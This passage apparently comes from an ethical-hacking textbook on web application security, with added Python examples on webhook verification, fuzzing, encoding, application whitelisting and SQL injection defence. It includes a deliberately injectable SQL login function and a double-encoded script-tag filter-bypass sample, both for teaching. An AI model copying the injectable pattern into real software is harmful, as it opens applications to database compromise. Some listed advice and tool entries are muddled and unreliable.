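            return 429, "rate limit exceeded"
        ok, reason = verify_request(self.secret, method, path, body, timestamp, signature, now)
        if not ok:
            return 401, reason
        return 200, "accepted"
```

The limiter is keyed on the network peer rather than on a client identifier taken from the unauthenticated request, because anything the client can choose freely can be set to another customer's value to exhaust that customer's quota; once the signature has been verified, a second, per-account quota keyed on the authenticated identity is the natural place to enforce the business limit.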


Best Practices for Securing Webhooks

■ Use shared authentication secrets such as HTTP basic authentication for all webhooks to prevent any random malicious data
■ Implement webhook signing to verify the data received from the ESPs and use the constant time-compare function
■ Track event_id to avoid unintentional double-processing of the same events through replay attacks
■ Ensure that the firewall rejects webhook calls from unauthorized sources other than the ESP's IP addresses
■ Use rate limiting on webhook calls to control the incoming and outgoing traffic
■ Compare the X-Cld-Timestamp of the webhook with the current timestamp to prevent timing attacks
■ Validate the X-OP-Timestamp within a threshold from the current time
■ Ensure that the event processing is idempotent to prevent the replication of event receipts
■ Ensure that the webhook code responds with 200 OK (success) instead of 4xx or 5xx statuses in case of errors
■ Ensure that the webhook URL supports the HTTP HEAD method to retrieve meta-information
■ Use threaded requests to send multiple requests simultaneously and to update data in the API rapidly
■ Ensure that the tokens are stored against store_hash and not the user data

Best Practices for Securing Webhooks


Various best practices for securing webhooks are as follows:
■ Use HTTPS instead of HTTP to protect webhook payloads from exposure in transit.
■ Require a shared authentication secret (for example, HTTP basic authentication
credentials) on every webhook endpoint so that unauthenticated requests are rejected
before any data is processed.
■ Implement webhook signing to verify the data received from the email service providers
(ESPs), and compare signatures with a constant-time comparison function.
■ Track event_id so that the same event is not processed twice, whether through provider
redelivery or a replay attack.
■ Ensure that the firewall rejects webhook calls from any source other than the ESP's
published IP addresses.
■ Apply rate limiting to webhook calls at the web server to control the incoming and
outgoing traffic.
■ Compare the request timestamp carried in the webhook (for example X-Cld-Timestamp or
X-OP-Timestamp, depending on the provider) with the current time and reject requests
outside an acceptable threshold, so that a captured request cannot be replayed later.
■ Ensure that event processing is idempotent, so that a redelivered event does not
produce duplicate effects.
■ Acknowledge receipt with 200 OK once the event has been accepted for processing rather
than returning 4xx or 5xx for internal processing errors, because providers deactivate
endpoints that keep failing; handle the processing failure on your side (queue, retry,
alert).
■ Ensure that the webhook URL supports the HTTP HEAD method so that meta-information can
be retrieved without transferring the entire content.
■ Use threaded requests to send multiple requests simultaneously and to update data in
the API rapidly.
■ Store tokens against the store_hash rather than against user data.
■ Verify clients by implementing mutual TLS.
■ Do not send confidential information through webhooks; send an identifier and let the
receiver fetch the details through an authorized API.
■ Use HMAC-based signatures to perform message verification and prevent payload
tampering.
■ Record every webhook payload in the database under a unique event ID.
■ Log each webhook that is sent so that deliveries can be debugged when required.
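The signing, timestamp, and idempotency checks from the list above, combined in one receiver, as an added example written for this page (it is not EC-Council's code and not any provider's SDK). The header names, the "timestamp.body" signing format, and the five-minute window are assumptions chosen for the illustration; a real provider documents its own. The demo() function builds a constructed delivery, replays it, tampers with it, and sends a stale copy.

```python
import hashlib
import hmac
import json
import time

# Constructed secret shared with the webhook provider (in practice, issued by the provider).
WEBHOOK_SECRET = b"whsec_example_shared_secret"
MAX_SKEW_SECONDS = 300  # reject events older than 5 minutes (or from the future)

# Assumed header names for this example; real providers use their own.
TIMESTAMP_HEADER = "X-Webhook-Timestamp"
SIGNATURE_HEADER = "X-Webhook-Signature"


def sign(secret: bytes, timestamp: str, body: bytes) -> str:
    """HMAC-SHA256 over 'timestamp.body', so the timestamp is covered by the signature."""
    message = timestamp.encode() + b"." + body
    return hmac.new(secret, message, hashlib.sha256).hexdigest()


class WebhookReceiver:
    def __init__(self, secret: bytes, now=time.time):
        self.secret = secret
        self.now = now
        self.seen_event_ids = set()   # idempotency store; a database table in production
        self.processed = []           # events actually applied

    def handle(self, headers: dict, body: bytes) -> tuple:
        """Return (status, reason) for one delivery, mirroring an HTTP response."""
        ts = headers.get(TIMESTAMP_HEADER)
        sig = headers.get(SIGNATURE_HEADER)
        if ts is None or sig is None:
            return 401, "missing signature headers"
        # 1. Timestamp window: bounds how long a captured request stays replayable.
        try:
            skew = abs(self.now() - int(ts))
        except ValueError:
            return 400, "bad timestamp"
        if skew > MAX_SKEW_SECONDS:
            return 401, "stale timestamp"
        # 2. Signature check with a constant-time comparison (no early exit on mismatch).
        expected = sign(self.secret, ts, body)
        if not hmac.compare_digest(expected, sig):
            return 401, "bad signature"
        # 3. Parse the payload only after it has been authenticated.
        try:
            event = json.loads(body)
            event_id = event["event_id"]
        except (ValueError, KeyError, TypeError):
            return 400, "malformed event"
        # 4. Idempotent processing: a replayed or redelivered event is acknowledged, not re-applied.
        if event_id in self.seen_event_ids:
            return 200, "duplicate ignored"
        self.seen_event_ids.add(event_id)
        self.processed.append(event)
        return 200, "ok"


def demo() -> dict:
    """Constructed scenario: a valid delivery, its replay, a tampered body, and a stale copy."""
    fixed_now = 1_700_000_000
    receiver = WebhookReceiver(WEBHOOK_SECRET, now=lambda: fixed_now)
    body = json.dumps({"event_id": "evt_1", "type": "email.delivered"}).encode()
    ts = str(fixed_now - 10)
    good = {TIMESTAMP_HEADER: ts, SIGNATURE_HEADER: sign(WEBHOOK_SECRET, ts, body)}
    results = {
        "valid": receiver.handle(good, body)[0],                                   # 200
        "replay": receiver.handle(good, body),                                     # (200, "duplicate ignored")
        "tampered": receiver.handle(good, body.replace(b"delivered", b"bounced"))[0],  # 401
    }
    old_ts = str(fixed_now - 3600)
    stale = {TIMESTAMP_HEADER: old_ts, SIGNATURE_HEADER: sign(WEBHOOK_SECRET, old_ts, body)}
    results["stale"] = receiver.handle(stale, body)[0]                             # 401
    results["processed"] = len(receiver.processed)                                 # 1
    return results


if __name__ == "__main__":
    print(demo())
```

hmac.compare_digest() is the constant-time comparison the list calls for; the timestamp window bounds how long a captured request remains valid, and the event_id set is what makes processing idempotent (in production it is a database table with a unique constraint, checked before the event is applied).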

Module 14 Page 2141 Ethical Hacking and Countermeasures Copyright © by EC-Council


All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

LO#05: Summarize the Techniques used in Web Application Security


Web Application Security


After learning the hacking methodologies adopted by attackers of web applications and the
tools they use, it is important to learn how to secure these applications from such attacks. A
careful security analysis will help you, as an ethical hacker, to protect your applications. To do
so, design, develop, and configure web applications using the countermeasures and techniques
discussed in this section.



Web Application Security Testing


Web application security testing is a process of conducting security assessment and
performance analysis of an application and generating timely reports on its security levels and
threat exposures. It is often conducted by security professionals and programmers to test and
strengthen the security of an application using the following techniques:
• Manual Web Application Security Testing

Manual security testing involves testing a web application using manually designed data,
customized code, and browser extension tools such as SecApps to detect vulnerabilities
and weaknesses in the application. It mainly focuses on business logic errors and threat
analysis, which automated scanners tend to miss. Security professionals also use tools
such as Selenium, JMeter, LoadRunner, QTP, Bugzilla, and TestLink to support manual
testing.
■ Automated Web Application Security Testing

This technique automates the testing process. Automated testing tools can rapidly and
systematically discover vulnerabilities so that they can be patched early. The tests are
incorporated into each development stage to give constant feedback: every code change
is analysed and developers are notified immediately if a vulnerability is detected.
Security professionals use tools such as Ranorex Studio, TestComplete, Leapwork,
Katalon Studio, and Testsigma to carry out automated testing.
■ Static Application Security Testing (SAST)

Static application security testing is also referred to as white-box testing: the complete
system architecture, including the source code of the application or software under
test, is already known to the tester. SAST tools assist developers in analysing the source
code to discover and report design and implementation flaws that could open the door
to attacks, and they check that the code complies with defined rules, standards, and
guidelines. Security professionals use tools such as Codacy, Appknox, AttackFlow,
bugScout, and PT Application Inspector to perform SAST.
• Dynamic Application Security Testing (DAST)

Unlike SAST, DAST is a black-box approach: the system architecture and source code of
the application under test are not known to the tester. DAST tools exercise the running
application to identify issues in interfaces, requests/responses, sessions, scripts,
authentication processes, code injection, and so on, allowing testers to discover
vulnerabilities that only appear at run time. DAST tools also use fuzzing, which sends
unexpected and malformed test cases to a web page. Security professionals use tools such
as Invicti, Acunetix Vulnerability Scanner, HCL AppScan, Micro Focus Fortify on Demand,
and Appknox to perform DAST.



Web Application Fuzz Testing


Web application fuzz testing (fuzzing) is a black-box testing method. It is a quality checking and
assurance technique used to identify coding errors and security loopholes in web applications.
Massive amounts of random or semi-random data called "fuzz" are generated by fuzz testing
tools (fuzzers) and sent to the target web application to discover vulnerabilities that could be
exploited. Attackers use the same approach to crash a victim's web application and cause havoc
in the shortest possible time. Security personnel and web developers employ fuzz testing to
check the robustness and resilience of a developed web application against attacks such as
buffer overflow, DoS, XSS, and SQL injection.
Steps of Fuzz Testing

Web application fuzz testing involves the following steps:


■ Identify the target system
■ Identify inputs
■ Generate fuzzed data
■ Execute the test using fuzz data
■ Monitor system behavior
■ Log defects
Fuzz Testing Strategies

■ Mutation-Based: Existing data samples are used to create new test data, which is then
mutated again to produce further cases. This type of testing starts with a valid sample
and keeps mutating it until the test goal is reached.


■ Generation-Based: New test data is generated from scratch, and the amount of data to
be generated is predefined by the testing model.
■ Protocol-Based: The protocol fuzzer sends forged packets to the application under test.
This approach requires detailed knowledge of the protocol format being tested: a list of
specifications is written into the fuzzer tool, and model-based test generation then
walks through the listed specifications and introduces irregularities in the data
contents, sequence, and so on.
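The six steps and the mutation-based strategy in one runnable fuzzer, as an added example that is not part of the original text. Because fuzzing over HTTP needs a live target, target_handler() is a constructed in-process stand-in with two planted defects (an overlong input raises, a single quote produces a 500); the mutators, seed input, and iteration count are likewise chosen for the illustration.

```python
import random
import string


def target_handler(params: dict) -> tuple:
    """Constructed stand-in for the target web application's request handler.
    Returns (status_code, body). The two defects are planted for the example."""
    user = params.get("user", "")
    if len(user) > 256:                 # planted defect: fixed-size copy of the parameter
        raise OverflowError("buffer too small for 'user'")
    if "'" in user:                     # planted defect: quote breaks a hand-built SQL string
        return 500, "SQL syntax error near \"'\""
    return 200, "hello " + user


METACHARS = ["'", '"', "<", ">", "%", "\x00", "\r\n", ";"]

MUTATORS = [
    lambda s: s + random.choice(METACHARS),                                  # append a metacharacter
    lambda s: s * random.randint(2, 64),                                     # grow the input
    lambda s: s[: len(s) // 2],                                              # truncate
    lambda s: "".join(random.choice(string.printable) for _ in range(max(len(s), 1))),  # randomise
]


def mutate(seed: str, rounds: int) -> str:
    """Mutation-based strategy: start from a valid sample and apply random mutators repeatedly."""
    value = seed
    for _ in range(rounds):
        value = random.choice(MUTATORS)(value)
    return value


def fuzz(seed: str, iterations: int, rng_seed: int = 0) -> list:
    """Steps 3 to 6 of the procedure: generate fuzz, execute, monitor behaviour, log defects."""
    random.seed(rng_seed)               # fixed seed so that a logged defect can be reproduced
    defects = []
    for _ in range(iterations):
        case = mutate(seed, rounds=random.randint(1, 3))
        try:
            status, body = target_handler({"user": case})
        except Exception as exc:        # crash or unhandled exception: always a defect
            defects.append({"case": case[:40], "kind": "crash", "detail": repr(exc)})
            continue
        if status >= 500:               # server-side error: log it for manual inspection
            defects.append({"case": case[:40], "kind": "http %d" % status, "detail": body})
    return defects


def defect_kinds(defects: list) -> set:
    """Summarise which classes of defect a run produced."""
    return {d["kind"] for d in defects}


if __name__ == "__main__":
    for defect in fuzz("alice", 1000):
        print(defect)
```

The fixed RNG seed is what makes a logged defect reproducible; the loop covers the generate, execute, monitor, and log steps, and the two planted defects correspond to the buffer overflow and SQL injection classes the page lists. Replacing target_handler() with a function that sends the case to a real URL and returns the status and body turns this into the HTTP client of the scenario below.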
Fuzz Testing Scenario
The diagram below shows an overview of the main components of the fuzzer. An attack script is
fed to the fuzz program, which translates the attacks into HTTP requests that an HTTP client
sends to the target. The target's responses come back through the same client, and every
request and its response are logged for manual inspection.

Attack script (as shown in the figure):

    Setup('WebApplicationName') do
      @host = "localhost"
      @port = 80
      ...
    end

Attack Script -> Fuzz Program -> HTTP Client -> target (Response returned) -> Logs

Figure 14.102: Web application fuzz testing scenario

Fuzz Testing Tools:

■ WSFuzzer (https://owasp.org)
■ WebScarab (https://owasp.org)
■ Burp Suite (https://portswigger.net)
■ HCL AppScan Standard (https://www.hcltechsw.com)
■ Peach Fuzzer (https://www.peach.tech)



Source Code Review


Source code reviews are used to detect bugs and irregularities in developed web applications.
They can be performed manually or with automated tools, and they concentrate on the areas of
the application code that handle authentication, session management, and data validation.
They can identify vulnerabilities caused by unvalidated data as well as poor coding practices
that allow attackers to exploit the web application.

Figure 14.103: Manual and automated source code review. The figure contrasts the two flows:
in manual review the developer pushes code, a reviewer reads it and returns feedback, and the
code is deployed only if it is approved; in automated review the pushed code is run through an
automated code review, built if it passes, and otherwise the errors are reported back so that
the developer can modify the code.



Encoding Schemes
Encoding is the process of converting data into another representation so that it can be stored
or transmitted safely by systems that would otherwise misinterpret some of its characters;
decoding reverses the process and restores the original data. Encoding is not encryption: no
key is involved, and anyone who knows the scheme can decode the data. Web applications employ
different encoding schemes so that unusual characters and binary data are handled in the
intended manner, and attackers use the same schemes to disguise payloads and bypass input
filters that inspect only the raw form.


Types of Encoding Schemes


■ URL Encoding
Web browsers and web servers permit URLs to contain only printable ASCII characters.
Several characters in this range have special meanings in the URL scheme or the HTTP
protocol, so they are restricted in the parts of a URL where they would be ambiguous.
URL encoding converts such characters into a form that can be safely transported over
HTTP: each restricted or non-printable byte is replaced with "%" followed by its
two-digit hexadecimal value, for example:
o %3d =
o %0a new line
o %20 space

■ HTML Encoding
HTML encoding represents characters that carry HTML syntax so that they can be safely
embedded in an HTML document as data rather than markup. If user-supplied text
containing such characters is placed in a page as-is, the browser interprets it as part
of the document structure; HTML encoding replaces them with entity strings that the
browser renders as the literal characters. Common entities are:
o &amp; &
o &lt; <
o &gt; >
■ Unicode Encoding
Unicode encoding is of two types: 16-bit Unicode encoding and UTF-8.
o 16-bit Unicode Encoding
It replaces unusual Unicode characters with "%u" followed by the character's
Unicode code point expressed as four hexadecimal digits. This form is not part of the
URL standard, but some web servers (historically IIS) decode it.
• %u2215 ∕ (division slash)
o UTF-8
It is a variable-length encoding standard in which each byte of the character's UTF-8
form is expressed in hexadecimal and prefixed with %.
• %c2%a9 ©
• %e2%89%a0 ≠


■ Base64 Encoding
The Base64 encoding scheme represents any binary data using only printable ASCII
characters. It is generally used for encoding email attachments for safe transmission
over SMTP and also for encoding user credentials, for example in the HTTP basic
authentication header. Base64 is reversible and provides no confidentiality.
For example, the word "cake" is the bytes 01100011 01100001 01101011 01100101. Base64
regroups them into 6-bit units, padding the last unit with zeros:
011000 110110 000101 101011 011001 010000
Each unit indexes the Base64 alphabet (Y, 2, F, r, Z, Q), and the two bytes missing from
the final 3-byte group are marked with "=", giving "Y2FrZQ==".
■ Hex Encoding
Hex encoding represents each byte of a string by its two-digit hexadecimal value, so
that a collection of characters can be transmitted as binary data. For example (ASCII):
Hello 48656C6C6F
Jason 4A61736F6E
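The encodings above side by side, as an added example (not part of the EC-Council text) written for this page. The encoder functions use Python's standard library; the %u form has no standard-library encoder, so it is built by hand. canonicalize() and contains_script_tag() are hypothetical helpers that show the security point: a filter must run on the fully decoded value, because "%253Cscript%253E" or "&lt;script&gt;" contain no literal angle bracket until they are decoded.

```python
import base64
import html
import re
import urllib.parse


def url_encode(s: str) -> str:
    """%XX for every UTF-8 byte except the unreserved characters of RFC 3986."""
    return urllib.parse.quote(s, safe="")


def html_encode(s: str) -> str:
    """Named entities for the characters that carry HTML syntax."""
    return html.escape(s, quote=True)


def unicode16_encode(s: str) -> str:
    """IIS-style %uXXXX form of each code point (not a URL standard, but still decoded by some servers)."""
    return "".join("%%u%04x" % ord(c) for c in s)


def utf8_percent_encode(s: str) -> str:
    """Each UTF-8 byte as %XX, lower-case hex as on the page: '©' -> %c2%a9."""
    return "".join("%%%02x" % b for b in s.encode("utf-8"))


def base64_encode(s: str) -> str:
    return base64.b64encode(s.encode("utf-8")).decode("ascii")


def hex_encode(s: str) -> str:
    return s.encode("utf-8").hex().upper()


_PCT_U = re.compile(r"%u([0-9a-fA-F]{4})")


def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Decode %uXXXX, %XX and HTML entities repeatedly until the value stops changing.
    Each round undoes one layer, so double-encoded input needs two rounds; an input
    that never stabilises within max_rounds is treated as hostile."""
    for _ in range(max_rounds):
        decoded = _PCT_U.sub(lambda m: chr(int(m.group(1), 16)), value)
        decoded = urllib.parse.unquote(decoded)
        decoded = html.unescape(decoded)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("input did not stabilise after %d decode rounds" % max_rounds)


def contains_script_tag(raw: str) -> bool:
    """A filter applied to the canonical form instead of the raw bytes."""
    return "<script" in canonicalize(raw).lower()


if __name__ == "__main__":
    for sample in ["<a&b>", "©", "≠", "∕", "cake", "Hello"]:
        print(sample, url_encode(sample), html_encode(sample), unicode16_encode(sample),
              utf8_percent_encode(sample), base64_encode(sample), hex_encode(sample))
    print(canonicalize("%253Cscript%253E"))   # <script>
```

Note that urllib.parse.quote() emits upper-case hex (%3C) while the page's UTF-8 examples use lower case (%c2%a9); decoders accept both, which is one more reason to compare canonical forms rather than raw strings.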



Whitelisting vs. Blacklisting Applications


Web applications have played an important role in the global adoption of digital
transformation, and this rapid growth has motivated attackers to compromise systems by
exploiting flaws in those applications. To thwart such attacks, security professionals need to
implement a range of security policies and testing strategies.
Whitelisting and blacklisting is one such strategy for keeping applications, networks, and
infrastructure secure. It defines a list of entities that should be allowed and a list that should
be blocked, so that malicious software can be stopped before it enters the organizational
network.
■ Application Whitelisting

Application whitelisting specifies the application components, such as software
libraries, plugins, extensions, and configuration files, and the legitimate software that
are permitted to execute on a system; anything not on the list is denied. It prevents
unauthorized programs from executing and spreading, and blocks the installation of
unapproved or vulnerable applications. Because only approved code can run, whitelisting
also protects against ransomware and other malware that has not yet been catalogued.
■ Application Blacklisting

Application blacklisting specifies the malicious applications or software that are not
permitted to execute on a system or network; everything else is allowed. It is performed
by blocking known applications that can cause damage or lead to attacks. Blacklisting is
threat-centric: it can only block what has already been identified, so new or modified
malware passes through, and a stale list leads to attacks and data loss. Hence, the
blacklist must be updated regularly to defend against the latest malware. Application
blacklisting can be implemented by adding the names of the applications to be blocked at
the firewall level or by installing dedicated software to block them.
■ Blacklisting and whitelisting for basic URL management

URL blacklisting prevents the user from loading web pages from the blacklisted URLs; the
user can access every URL except those in the blacklist. URL whitelisting permits access
only to specific URLs, and is typically used to define exceptions to entries in the URL
blacklist.
URL whitelisting is performed using the following methods:
o Allow access to all URLs except the blocked ones: Whitelisting can allow the users
to access the rest of the network applications
o Block access to all URLs except permitted ones: Whitelisting can permit access to a
limited list of URLs
o Define exceptions to very restrictive blacklists: Whitelisting lets users access
schemes, subdomains of other domains, specific paths, or ports
o Allow the browser to open applications: Whitelisting is performed only for specific
external protocol handlers so that the browser can automatically execute
applications
URL blacklisting is performed using the following methods:
o Allow access to all URLs except the blocked ones: Blacklisting prevents users from
accessing blocked websites
o Block access to all URLs except permitted ones: Blacklisting blocks access to all
malicious URLs
o Define exceptions to very restrictive blacklists: Blacklisting restricts access to all
URLs that are vulnerable to attacks
o Allow the browser to open apps: Blacklisting prevents the browser from
automatically executing applications
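Application blacklisting by name versus whitelisting by content hash, as an added example (not from the EC-Council text or any product). ApplicationControl is a hypothetical policy class; demo() writes constructed files to a temporary directory so that the example runs offline.

```python
import hashlib
import os
import tempfile


def sha256_of(path: str) -> str:
    """Hash the file contents in chunks; the hash is what a whitelist entry identifies."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


class ApplicationControl:
    """Hypothetical application-control policy holding both kinds of list."""

    def __init__(self):
        self.blocked_names = set()    # blacklist: file names of known-bad programs
        self.allowed_hashes = set()   # whitelist: SHA-256 of every approved binary

    def block_name(self, name: str) -> None:
        self.blocked_names.add(name.lower())

    def allow_file(self, path: str) -> None:
        self.allowed_hashes.add(sha256_of(path))

    def blacklist_permits(self, path: str) -> bool:
        """Default allow: only a name on the list is stopped."""
        return os.path.basename(path).lower() not in self.blocked_names

    def whitelist_permits(self, path: str) -> bool:
        """Default deny: only content whose hash is on the list may run."""
        return sha256_of(path) in self.allowed_hashes


def demo() -> dict:
    """Constructed scenario: an approved tool, a known-bad file, the same bad file renamed,
    and the approved tool after it has been modified on disk."""
    workdir = tempfile.mkdtemp()
    approved = os.path.join(workdir, "backup.exe")
    known_bad = os.path.join(workdir, "miner.exe")
    renamed_bad = os.path.join(workdir, "svchost.exe")
    with open(approved, "wb") as f:
        f.write(b"approved backup tool (constructed bytes)")
    for path in (known_bad, renamed_bad):
        with open(path, "wb") as f:
            f.write(b"cryptominer (constructed bytes)")

    policy = ApplicationControl()
    policy.block_name("miner.exe")
    policy.allow_file(approved)

    results = {
        "blacklist_approved": policy.blacklist_permits(approved),     # True
        "blacklist_known_bad": policy.blacklist_permits(known_bad),   # False: name matches
        "blacklist_renamed": policy.blacklist_permits(renamed_bad),   # True: a rename evades it
        "whitelist_approved": policy.whitelist_permits(approved),     # True
        "whitelist_known_bad": policy.whitelist_permits(known_bad),   # False
        "whitelist_renamed": policy.whitelist_permits(renamed_bad),   # False: hash is unchanged
    }
    with open(approved, "ab") as f:          # the approved binary is trojanised in place
        f.write(b" + backdoor")
    results["blacklist_tampered"] = policy.blacklist_permits(approved)  # True: name still fine
    results["whitelist_tampered"] = policy.whitelist_permits(approved)  # False: hash changed
    return results


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, verdict)
```

The renamed copy shows why the page calls blacklisting threat-centric: the name changes, the hash does not. The tampered case shows the flip side, and also the operational cost of whitelisting: every legitimate update to an approved binary changes its hash and must be re-approved, which is why products such as the ones listed next automate that placement.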


Application Whitelisting and Blacklisting Tools

Various tools that help security professionals in application whitelisting and blacklisting are
discussed below.
• ManageEngine Application Control Plus

Source: https://www.manageengine.com
ManageEngine Application Control Plus automates the placement of applications in
whitelists and blacklists based on specified control rules. With its built-in, sophisticated
Endpoint Privilege Management feature, Application Control Plus enables organizations
to establish the principle of least privilege (PoLP) and zero trust by allowing only
authorized access to applications and their related privileges.


Figure 14.104: Screenshot of ManageEngine Application Control Plus, showing the Application
Groups view in which executables are listed by file name together with their file hashes

Some additional application whitelisting and blacklisting tools are as follows:

■ ShadowNet (https://riskanalytics.com)
■ Cisco Umbrella (https://umbrella.cisco.com)
■ Centrify Server Suite (https://www.centrify.com)
■ APT Groups and Operations (https://docs.google.com)
■ NordVPN (https://nordvpn.com)


How to Defend Against Injection Attacks

■ SQL Injection Attacks
o Limit the length of user input
o Use custom error messages
o Monitor DB traffic using an IDS and a WAF
o Disable commands such as xp_cmdshell
o Isolate the database server and web server

■ Command Injection Flaws
o Perform input validation
o Escape dangerous characters
o Use language-specific libraries that avoid problems due to shell commands
o Perform input and output encoding
o Use a safe API that entirely avoids the use of the interpreter

■ LDAP Injection Attacks
o Perform type, pattern, and domain value validation on all input data
o Make the LDAP filter as specific as possible
o Validate and restrict the amount of data returned to the user
o Implement tight access control on the data in the LDAP directory
o Use LDAPS (LDAP over SSL) to secure communication on the web server

■ File Injection Attacks
o Strongly validate user input
o Consider implementing a chroot jail
o PHP: Disable allow_url_fopen and allow_url_include in php.ini
o PHP: Disable register_globals and use E_STRICT to find uninitialized variables
o PHP: Ensure that all file and stream functions (stream_*) are carefully vetted

■ Server-Side JS Injection
o Ensure that user inputs are strictly validated on the server side
o Avoid using the eval() function to parse the user input
o Never use multiple commands that have identical effects
o Use JSON.parse() instead of eval() to parse JSON input
o Include "use strict" at the beginning of each function

■ Server-Side Include Injection
o Validate user input and ensure it does not include SSI directives
o Apply HTML encoding to the user input before execution
o Ensure directives are confined only to the web pages where they are required
o Avoid using pages with filename extensions such as .stm, .shtm, and .shtml

■ Server-Side Template Injection
o Do not create templates from user inputs
o Use a simple template engine such as Mustache or a Python template
o Execute the template inside a sandboxed environment
o Consider loading static template files wherever possible
o Ensure that dynamic data are passed to a template using the template engine's built-in
functionality

■ Log Injection
o Pass log codes instead of messages through parameters
o Use correct error codes and easily recognizable error messages
o Avoid using API calls to log actions due to their visibility in browser network calls
o Pass user IDs or publicly non-identifiable inputs as the parameters at logging endpoints

■ HTML Injection
o Validate all the user inputs to remove the HTML-syntax substrings from user-supplied text
o Check the inputs for unwanted script or HTML code such as <script></script> and
<html></html>
o Ensure that user outputs are also encoded, examined, and validated along with user inputs
o Enable the HttpOnly flag on the server side to ensure that the cookies generated by the
application are not available to client-side script

■ CRLF Injection
o Use a function to encode CRLF special characters and avoid using the user input in the
response headers
o Update to a version of the programming language that disallows the injection of CR and
LF characters
o Check and remove any newline strings in the content before passing it to the HTTP header
o Encrypt the data that is passed to the HTTP headers to hide the CR and LF codes
o Configure XSSUrlFilter in the web application to prevent CRLF injection attacks

■ XSS Attacks
o Validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all
parameters) against a rigorous specification
o Use testing tools extensively during the design phase to eliminate XSS holes in the
application before it goes into use
o Use a web application firewall to block the execution of malicious scripts
o Convert all non-alphanumeric characters to HTML character entities before displaying the
user input in search engines and forums
o Encode input and output and filter metacharacters in the input

How to Defend Against Injection Attacks


■ SQL Injection Attacks
o Limit the length of user input.
o Use custom error messages.
o Monitor DB traffic using an IDS and a WAF.
o Disable commands such as xp_cmdshell.
o Isolate the database server and web server.
o Always use a method attribute set for POST and a low-privileged account for DB
connections.
o Run a database service account with minimal rights.
o Move extended stored procedures to an isolated server.
o Use typesafe variables or functions such as isNumeric() to ensure type safety.
o Validate and sanitize user inputs passed to the database.
o Avoid using dynamic SQL or constructing queries with user input.
o Use prepared statements, parameterized queries, or stored procedures to access
the database.
o Display the minimum required information and use the "RemoteOnly" customErrors
mode to display verbose error messages on the local machine.


o Perform proper escaping and character filtering to avoid special string characters
and symbols such as single quotes (').
o Always use a logically defined whitelist instead of a blacklist to avoid bad code.
o Use object-relational mapping (ORM) frameworks to make the conversion of SQL
result sets into code objects more consistent.
o Use vulnerability scanners to identify possible entry points.
o Avoid using shared databases and the same account for multiple databases.
o Insist that the individuals involved in application development consider all the risks
associated with SQL injection.
o Always use the latest versions of programming languages and technologies for
development.
o Regularly update and patch applications and database servers.
o Harden OSes and applications by following the guidelines issued by vendors.
o Disable unnecessary functionalities of the database.
o Audit databases, logs, privileges, and binding terms regularly.
o Scan applications with a dynamic web vulnerability scanner to prevent code
injection.
o Enumerate the authorized values within a conditional statement.
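As an added example (not code from the textbook), the concatenated query beside its parameterized form using Python's sqlite3 module, with the isNumeric()-style type check and input length limit from the list above; the users table, its rows and the MAX_FIELD_LEN policy are constructed for the demonstration.

```python
import sqlite3
from typing import Optional

MAX_FIELD_LEN = 64  # limit the length of user input (assumed application policy)


def make_db() -> sqlite3.Connection:
    """Build an in-memory table with constructed sample users (not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (name, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> list:
    """Dynamic SQL built by string concatenation: the 'avoid' case from the list above.
    A single quote in the input changes the structure of the statement."""
    query = (
        "SELECT name FROM users WHERE name = '" + name + "' AND password = '" + password + "'"
    )
    return [row[0] for row in conn.execute(query)]


def login_parameterized(conn: sqlite3.Connection, name: str, password: str) -> list:
    """Parameterized query: the driver binds the values separately from the SQL text,
    so quotes in the input are always data and never part of the statement."""
    for value in (name, password):
        if len(value) > MAX_FIELD_LEN:
            raise ValueError("input too long")
    query = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (name, password))]


def is_numeric(value: str) -> bool:
    """Type-safety check for identifiers that must be integers (the isNumeric() idea)."""
    return value.isdigit()


def get_user_by_id(conn: sqlite3.Connection, raw_id: str) -> Optional[str]:
    """Validate the type first, then still bind the value as a parameter."""
    if not is_numeric(raw_id):
        raise ValueError("id must be numeric")
    row = conn.execute("SELECT name FROM users WHERE id = ?", (int(raw_id),)).fetchone()
    return row[0] if row else None
```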
■ Command Injection Flaws

The simplest way to defend against command injection flaws is to avoid them wherever
possible. Some language-specific libraries perform the same functions as many shell
commands and some system calls. These libraries do not invoke the operating system
shell interpreter and hence avoid most shell-command problems. For those calls that
must still be used, such as calls to backend databases, one must carefully validate the
data to ensure that it does not contain malicious content. One can also structure
requests so that all the supplied parameters are treated as data rather than as
potentially executable content.
Most systems call stored procedures with parameters that accept only valid input
strings to access a database, or use prepared statements, to provide significant
protection: the supplied input is treated as data, which reduces but does not
completely eliminate the risk involved in these external calls. One can always validate
the input to ensure the protection of the application in question. It is also important to
use least-privileged accounts to access the database to minimize the possibility of
attack.
Another robust measure against command injection is to run web applications with
only the privileges required to carry out their functions. Therefore, one should avoid
running the web server as root or accessing a database as a DBADMIN; otherwise, an
attacker may be able to misuse administrative rights. The use of the Java sandbox in
the J2EE environment stops the execution of system commands. When external
commands are used to check information that the user provides, create a mechanism
for handling all possible errors, timeouts, or blockages during the calls. Check all the
output, return, and error codes from the call to ensure that it performs as expected.
Doing so allows users to determine whether something has gone wrong; otherwise, an
attack might occur and never be detected.
Some countermeasures against command injection flaws are as follows:
o Perform input validation.
o Escape dangerous characters.
o Use language-specific libraries that avoid problems due to shell commands.
o Perform input and output encoding.
o Use a safe API that avoids use of the interpreter entirely.
o Structure requests so that all supplied parameters are treated as data rather than
potentially executable content.
o Use parameterized SQL queries.
o Use modular shell disassociation from the kernel.
o Use built-in library functions and avoid calling OS commands directly.
o Implement the least privileges to restrict the permissions to execute the OS
commands.
o Avoid executing commands such as exec or system without proper validation and
sanitization.
o Avoid invoking the shell interpreter in PHP by using pcntl_fork and pcntl_exec.
o Implement Python as a web framework instead of PHP for application development.
o Scan the applications with a dynamic web vulnerability scanner to prevent code
injection.
